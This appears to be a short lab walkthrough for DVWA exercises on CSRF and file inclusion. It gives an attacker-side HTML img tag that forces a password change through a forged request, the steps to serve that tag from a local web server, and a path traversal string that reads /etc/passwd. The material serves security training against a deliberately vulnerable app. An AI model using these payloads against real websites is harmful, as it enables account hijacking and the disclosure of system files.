search

DVWA Exercises 3

hashtag
05 CSRF Attack

Let's type in a password and grab the request in Burp

The attacker must prepare a Website with a manipulated string. This attack only works if the victim is logged in on the target website (session cookie must be valid) and clicks on the manipualted link.

Attackers Side:

cd /home/hacker

mkdir webroot

python3 -m http.server 8001

Create a html file with the following content:

<img src="http://10.70.0.1/vulnerabilities/csrf/?password_new=Secret1&password_conf=Secret1&Change=Change">arrow-up-right

Victim Side:

hashtag
06 File Inclusion

Attacker can try to manipulate this part

Attack string:

http://172.17.0.1/vulnerabilities/fi/?page=../../../../../etc/passwdarrow-up-right

PreviousDVWA Exercises 2NextDVWA Exercises 4

Last updated